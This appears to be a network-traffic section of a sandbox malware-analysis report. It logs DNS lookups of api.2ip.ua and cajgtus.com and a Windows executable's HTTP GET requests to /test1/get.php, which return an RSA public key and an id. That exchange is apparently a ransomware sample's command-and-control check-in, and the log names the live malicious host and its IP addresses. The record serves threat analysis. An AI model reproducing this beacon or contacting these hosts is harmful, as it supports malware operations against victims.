              Sep 2, 2024 18:21:08.670838118 CEST49702443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:08.670874119 CEST44349702188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:09.797396898 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:09.797449112 CEST44349703188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:09.797518015 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:09.809150934 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:09.809184074 CEST44349703188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:10.247605085 CEST44349703188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:10.247682095 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:10.253017902 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:10.253027916 CEST44349703188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:10.253269911 CEST44349703188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:10.253326893 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:10.264075994 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:10.304502010 CEST44349703188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:10.605998039 CEST44349703188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:10.606059074 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:10.606079102 CEST44349703188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:10.606107950 CEST44349703188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:10.606127977 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:10.606163025 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:10.606975079 CEST49703443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:10.606991053 CEST44349703188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:11.248816967 CEST4970580192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:11.249927998 CEST4970680192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:11.253730059 CEST8049705190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:11.253797054 CEST4970580192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:11.254311085 CEST4970580192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:11.254697084 CEST8049706190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:11.254772902 CEST4970680192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:11.256473064 CEST4970680192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:11.259093046 CEST8049705190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:11.261514902 CEST8049706190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.756006002 CEST8049705190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.756026983 CEST8049705190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.756041050 CEST8049706190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.756115913 CEST8049706190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.756127119 CEST8049705190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.756136894 CEST8049706190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.756181955 CEST4970580192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:13.756182909 CEST4970680192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:13.756232023 CEST4970580192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:13.756232023 CEST4970680192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:13.757093906 CEST8049705190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.757400990 CEST8049706190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.757453918 CEST4970580192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:13.757453918 CEST4970680192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:13.758354902 CEST8049706190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.758415937 CEST4970680192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:13.758697987 CEST8049705190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.758794069 CEST4970580192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:13.859994888 CEST4970580192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:13.872044086 CEST8049705190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:13.947313070 CEST4970680192.168.2.7190.220.21.28
              Sep 2, 2024 18:21:13.954180956 CEST8049706190.220.21.28192.168.2.7
              Sep 2, 2024 18:21:19.628081083 CEST49712443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:19.628129005 CEST44349712188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:19.628190041 CEST49712443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:19.658862114 CEST49712443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:19.658876896 CEST44349712188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:20.290790081 CEST44349712188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:20.290870905 CEST49712443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:20.294889927 CEST49712443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:20.294899940 CEST44349712188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:20.295150042 CEST44349712188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:20.295203924 CEST49712443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:20.296715021 CEST49712443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:20.344501972 CEST44349712188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:20.656244040 CEST44349712188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:20.656351089 CEST44349712188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:20.656367064 CEST49712443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:20.656450033 CEST49712443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:20.657322884 CEST49712443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:20.657344103 CEST44349712188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:32.140438080 CEST49725443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:32.140499115 CEST44349725188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:32.140571117 CEST49725443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:32.167256117 CEST49725443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:32.167298079 CEST44349725188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:32.692122936 CEST44349725188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:32.692296028 CEST49725443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:32.701266050 CEST49725443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:32.701284885 CEST44349725188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:32.701502085 CEST44349725188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:32.701632977 CEST49725443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:32.803451061 CEST49725443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:32.848511934 CEST44349725188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:33.150588036 CEST44349725188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:33.150684118 CEST44349725188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:33.150790930 CEST49725443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:33.150791883 CEST49725443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:33.151783943 CEST49725443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:33.151806116 CEST44349725188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:44.016531944 CEST49727443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:44.016577959 CEST44349727188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:44.016657114 CEST49727443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:44.030432940 CEST49727443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:44.030442953 CEST44349727188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:44.492352962 CEST44349727188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:44.492446899 CEST49727443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:44.497380972 CEST49727443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:44.497396946 CEST44349727188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:44.497613907 CEST44349727188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:44.497658968 CEST49727443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:44.499197960 CEST49727443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:44.544503927 CEST44349727188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:44.860797882 CEST44349727188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:44.860908985 CEST44349727188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:44.861002922 CEST49727443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:44.863576889 CEST49727443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:44.863600969 CEST44349727188.114.97.3192.168.2.7
              Sep 2, 2024 18:23:05.891160965 CEST49731443192.168.2.7188.114.97.3
              Sep 2, 2024 18:23:05.891202927 CEST44349731188.114.97.3192.168.2.7
              Sep 2, 2024 18:23:05.891279936 CEST49731443192.168.2.7188.114.97.3
              Sep 2, 2024 18:23:05.903120041 CEST49731443192.168.2.7188.114.97.3
              Sep 2, 2024 18:23:05.903135061 CEST44349731188.114.97.3192.168.2.7
              Sep 2, 2024 18:23:06.345822096 CEST44349731188.114.97.3192.168.2.7
              Sep 2, 2024 18:23:06.345977068 CEST49731443192.168.2.7188.114.97.3
              Sep 2, 2024 18:23:06.357278109 CEST49731443192.168.2.7188.114.97.3
              Sep 2, 2024 18:23:06.357294083 CEST44349731188.114.97.3192.168.2.7
              Sep 2, 2024 18:23:06.357539892 CEST44349731188.114.97.3192.168.2.7
              Sep 2, 2024 18:23:06.357590914 CEST49731443192.168.2.7188.114.97.3
              Sep 2, 2024 18:23:06.369554996 CEST49731443192.168.2.7188.114.97.3
              Sep 2, 2024 18:23:06.416506052 CEST44349731188.114.97.3192.168.2.7
              Sep 2, 2024 18:23:06.711565018 CEST44349731188.114.97.3192.168.2.7
              Sep 2, 2024 18:23:06.711662054 CEST44349731188.114.97.3192.168.2.7
              Sep 2, 2024 18:23:06.711853027 CEST49731443192.168.2.7188.114.97.3
              Sep 2, 2024 18:23:06.714422941 CEST49731443192.168.2.7188.114.97.3
              Sep 2, 2024 18:23:06.714445114 CEST44349731188.114.97.3192.168.2.7
              TimestampSource PortDest PortSource IPDest IP
              Sep 2, 2024 18:21:05.137840033 CEST5135453192.168.2.71.1.1.1
              Sep 2, 2024 18:21:05.165405989 CEST53513541.1.1.1192.168.2.7
              Sep 2, 2024 18:21:08.893810034 CEST5776553192.168.2.71.1.1.1
              Sep 2, 2024 18:21:09.896008968 CEST5776553192.168.2.71.1.1.1
              Sep 2, 2024 18:21:10.895678043 CEST5776553192.168.2.71.1.1.1
              Sep 2, 2024 18:21:11.234044075 CEST53577651.1.1.1192.168.2.7
              Sep 2, 2024 18:21:11.234121084 CEST53577651.1.1.1192.168.2.7
              Sep 2, 2024 18:21:11.234132051 CEST53577651.1.1.1192.168.2.7
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Sep 2, 2024 18:21:05.137840033 CEST192.168.2.71.1.1.10x8c0eStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:08.893810034 CEST192.168.2.71.1.1.10xb380Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:09.896008968 CEST192.168.2.71.1.1.10xb380Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:10.895678043 CEST192.168.2.71.1.1.10xb380Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Sep 2, 2024 18:21:05.165405989 CEST1.1.1.1192.168.2.70x8c0eNo error (0)api.2ip.ua188.114.97.3A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:05.165405989 CEST1.1.1.1192.168.2.70x8c0eNo error (0)api.2ip.ua188.114.96.3A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234044075 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com190.220.21.28A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234044075 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com217.219.131.81A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234044075 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com116.58.10.60A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234044075 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com58.151.148.90A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234044075 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com190.249.193.233A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234044075 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com197.164.156.210A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234044075 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com2.185.214.11A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234044075 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com191.191.224.16A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234044075 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com195.85.218.100A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234044075 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com190.218.247.16A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234121084 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com190.220.21.28A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234121084 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com217.219.131.81A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234121084 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com116.58.10.60A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234121084 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com58.151.148.90A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234121084 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com190.249.193.233A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234121084 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com197.164.156.210A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234121084 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com2.185.214.11A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234121084 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com191.191.224.16A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234121084 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com195.85.218.100A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234121084 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com190.218.247.16A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234132051 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com190.220.21.28A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234132051 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com217.219.131.81A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234132051 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com116.58.10.60A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234132051 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com58.151.148.90A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234132051 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com190.249.193.233A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234132051 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com197.164.156.210A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234132051 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com2.185.214.11A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234132051 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com191.191.224.16A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234132051 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com195.85.218.100A (IP address)IN (0x0001)false
              Sep 2, 2024 18:21:11.234132051 CEST1.1.1.1192.168.2.70xb380No error (0)cajgtus.com190.218.247.16A (IP address)IN (0x0001)false
              • api.2ip.ua
              • cajgtus.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.749705190.220.21.28806544C:\Users\user\Desktop\66d5df681876c_file010924.exe
              TimestampBytes transferredDirectionData
              Sep 2, 2024 18:21:11.254311085 CEST139OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: cajgtus.com
              Sep 2, 2024 18:21:13.756006002 CEST764INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:18 GMT
              Server: Apache/2.4.37 (Win64) PHP/5.6.40
              X-Powered-By: PHP/5.6.40
              Content-Length: 560
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 39 54 4c 48 66 75 77 67 4c 31 45 74 47 4e 77 5c 2f 77 35 65 56 5c 5c 6e 57 44 35 62 56 58 37 49 34 63 4f 55 53 78 79 47 37 59 70 62 41 6c 47 36 6b 4f 70 64 42 69 4e 6e 5a 4e 61 77 33 6f 30 75 37 77 54 79 4f 46 68 4c 31 6e 75 61 70 63 38 73 6c 57 6e 38 32 6c 48 6e 5c 5c 6e 62 76 78 4d 5a 75 6a 55 49 41 78 75 6a 57 48 7a 32 67 55 62 70 74 78 33 46 4c 70 4e 75 74 41 62 79 65 74 74 5c 2f 30 4c 36 78 7a 45 4d 58 46 6d 67 31 32 36 76 59 4d 2b 5c 2f 76 65 73 59 31 53 53 42 5c 5c 6e 50 78 45 73 4e 47 35 4c 6d 48 54 33 67 72 57 42 65 59 58 5c 2f 67 59 6f 75 47 62 7a 38 4f 6f 4c 54 6a 32 48 59 66 55 32 64 51 33 35 5a 30 44 36 6b 49 43 77 46 67 68 49 55 44 61 69 48 6c 42 2b 31 5c 5c 6e 71 51 35 71 5c 2f 46 5a 64 51 6c 7a [TRUNCATED]
              Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG6kOpdBiNnZNaw3o0u7wTyOFhL1nuapc8slWn82lHn\\nbvxMZujUIAxujWHz2gUbptx3FLpNutAbyett\/0L6xzEMXFmg126vYM+\/vesY1SSB\\nPxEsNG5LmHT3grWBeYX\/gYouGbz8OoLTj2HYfU2dQ35Z0D6kICwFghIUDaiHlB+1\\nqQ5q\/FZdQlzkFIhimqtbS+HbzpJB4dnIF\/TD9iNmFWJwjyAjaJjfdV1npllllYLK\\n3lHt4qRVdUfJBn0puzHB218fzdgcivOuvxzrBR9zm8vj45HmdquPQv5T8abYGYIn\\nXwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT"}
              Sep 2, 2024 18:21:13.757093906 CEST764INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:18 GMT
              Server: Apache/2.4.37 (Win64) PHP/5.6.40
              X-Powered-By: PHP/5.6.40
              Content-Length: 560
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 39 54 4c 48 66 75 77 67 4c 31 45 74 47 4e 77 5c 2f 77 35 65 56 5c 5c 6e 57 44 35 62 56 58 37 49 34 63 4f 55 53 78 79 47 37 59 70 62 41 6c 47 36 6b 4f 70 64 42 69 4e 6e 5a 4e 61 77 33 6f 30 75 37 77 54 79 4f 46 68 4c 31 6e 75 61 70 63 38 73 6c 57 6e 38 32 6c 48 6e 5c 5c 6e 62 76 78 4d 5a 75 6a 55 49 41 78 75 6a 57 48 7a 32 67 55 62 70 74 78 33 46 4c 70 4e 75 74 41 62 79 65 74 74 5c 2f 30 4c 36 78 7a 45 4d 58 46 6d 67 31 32 36 76 59 4d 2b 5c 2f 76 65 73 59 31 53 53 42 5c 5c 6e 50 78 45 73 4e 47 35 4c 6d 48 54 33 67 72 57 42 65 59 58 5c 2f 67 59 6f 75 47 62 7a 38 4f 6f 4c 54 6a 32 48 59 66 55 32 64 51 33 35 5a 30 44 36 6b 49 43 77 46 67 68 49 55 44 61 69 48 6c 42 2b 31 5c 5c 6e 71 51 35 71 5c 2f 46 5a 64 51 6c 7a [TRUNCATED]
              Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG6kOpdBiNnZNaw3o0u7wTyOFhL1nuapc8slWn82lHn\\nbvxMZujUIAxujWHz2gUbptx3FLpNutAbyett\/0L6xzEMXFmg126vYM+\/vesY1SSB\\nPxEsNG5LmHT3grWBeYX\/gYouGbz8OoLTj2HYfU2dQ35Z0D6kICwFghIUDaiHlB+1\\nqQ5q\/FZdQlzkFIhimqtbS+HbzpJB4dnIF\/TD9iNmFWJwjyAjaJjfdV1npllllYLK\\n3lHt4qRVdUfJBn0puzHB218fzdgcivOuvxzrBR9zm8vj45HmdquPQv5T8abYGYIn\\nXwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT"}
              Sep 2, 2024 18:21:13.758697987 CEST764INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:18 GMT
              Server: Apache/2.4.37 (Win64) PHP/5.6.40
              X-Powered-By: PHP/5.6.40
              Content-Length: 560
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 39 54 4c 48 66 75 77 67 4c 31 45 74 47 4e 77 5c 2f 77 35 65 56 5c 5c 6e 57 44 35 62 56 58 37 49 34 63 4f 55 53 78 79 47 37 59 70 62 41 6c 47 36 6b 4f 70 64 42 69 4e 6e 5a 4e 61 77 33 6f 30 75 37 77 54 79 4f 46 68 4c 31 6e 75 61 70 63 38 73 6c 57 6e 38 32 6c 48 6e 5c 5c 6e 62 76 78 4d 5a 75 6a 55 49 41 78 75 6a 57 48 7a 32 67 55 62 70 74 78 33 46 4c 70 4e 75 74 41 62 79 65 74 74 5c 2f 30 4c 36 78 7a 45 4d 58 46 6d 67 31 32 36 76 59 4d 2b 5c 2f 76 65 73 59 31 53 53 42 5c 5c 6e 50 78 45 73 4e 47 35 4c 6d 48 54 33 67 72 57 42 65 59 58 5c 2f 67 59 6f 75 47 62 7a 38 4f 6f 4c 54 6a 32 48 59 66 55 32 64 51 33 35 5a 30 44 36 6b 49 43 77 46 67 68 49 55 44 61 69 48 6c 42 2b 31 5c 5c 6e 71 51 35 71 5c 2f 46 5a 64 51 6c 7a [TRUNCATED]
              Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG6kOpdBiNnZNaw3o0u7wTyOFhL1nuapc8slWn82lHn\\nbvxMZujUIAxujWHz2gUbptx3FLpNutAbyett\/0L6xzEMXFmg126vYM+\/vesY1SSB\\nPxEsNG5LmHT3grWBeYX\/gYouGbz8OoLTj2HYfU2dQ35Z0D6kICwFghIUDaiHlB+1\\nqQ5q\/FZdQlzkFIhimqtbS+HbzpJB4dnIF\/TD9iNmFWJwjyAjaJjfdV1npllllYLK\\n3lHt4qRVdUfJBn0puzHB218fzdgcivOuvxzrBR9zm8vj45HmdquPQv5T8abYGYIn\\nXwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT"}


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.749706190.220.21.28801424C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              TimestampBytes transferredDirectionData
              Sep 2, 2024 18:21:11.256473064 CEST128OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: cajgtus.com
              Sep 2, 2024 18:21:13.756041050 CEST764INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:18 GMT
              Server: Apache/2.4.37 (Win64) PHP/5.6.40
              X-Powered-By: PHP/5.6.40
              Content-Length: 560
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 39 54 4c 48 66 75 77 67 4c 31 45 74 47 4e 77 5c 2f 77 35 65 56 5c 5c 6e 57 44 35 62 56 58 37 49 34 63 4f 55 53 78 79 47 37 59 70 62 41 6c 47 36 6b 4f 70 64 42 69 4e 6e 5a 4e 61 77 33 6f 30 75 37 77 54 79 4f 46 68 4c 31 6e 75 61 70 63 38 73 6c 57 6e 38 32 6c 48 6e 5c 5c 6e 62 76 78 4d 5a 75 6a 55 49 41 78 75 6a 57 48 7a 32 67 55 62 70 74 78 33 46 4c 70 4e 75 74 41 62 79 65 74 74 5c 2f 30 4c 36 78 7a 45 4d 58 46 6d 67 31 32 36 76 59 4d 2b 5c 2f 76 65 73 59 31 53 53 42 5c 5c 6e 50 78 45 73 4e 47 35 4c 6d 48 54 33 67 72 57 42 65 59 58 5c 2f 67 59 6f 75 47 62 7a 38 4f 6f 4c 54 6a 32 48 59 66 55 32 64 51 33 35 5a 30 44 36 6b 49 43 77 46 67 68 49 55 44 61 69 48 6c 42 2b 31 5c 5c 6e 71 51 35 71 5c 2f 46 5a 64 51 6c 7a [TRUNCATED]
              Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG6kOpdBiNnZNaw3o0u7wTyOFhL1nuapc8slWn82lHn\\nbvxMZujUIAxujWHz2gUbptx3FLpNutAbyett\/0L6xzEMXFmg126vYM+\/vesY1SSB\\nPxEsNG5LmHT3grWBeYX\/gYouGbz8OoLTj2HYfU2dQ35Z0D6kICwFghIUDaiHlB+1\\nqQ5q\/FZdQlzkFIhimqtbS+HbzpJB4dnIF\/TD9iNmFWJwjyAjaJjfdV1npllllYLK\\n3lHt4qRVdUfJBn0puzHB218fzdgcivOuvxzrBR9zm8vj45HmdquPQv5T8abYGYIn\\nXwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT"}
              Sep 2, 2024 18:21:13.757400990 CEST764INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:18 GMT
              Server: Apache/2.4.37 (Win64) PHP/5.6.40
              X-Powered-By: PHP/5.6.40
              Content-Length: 560
              Connection: close
              Content-Type: text/html; charset=UTF-8
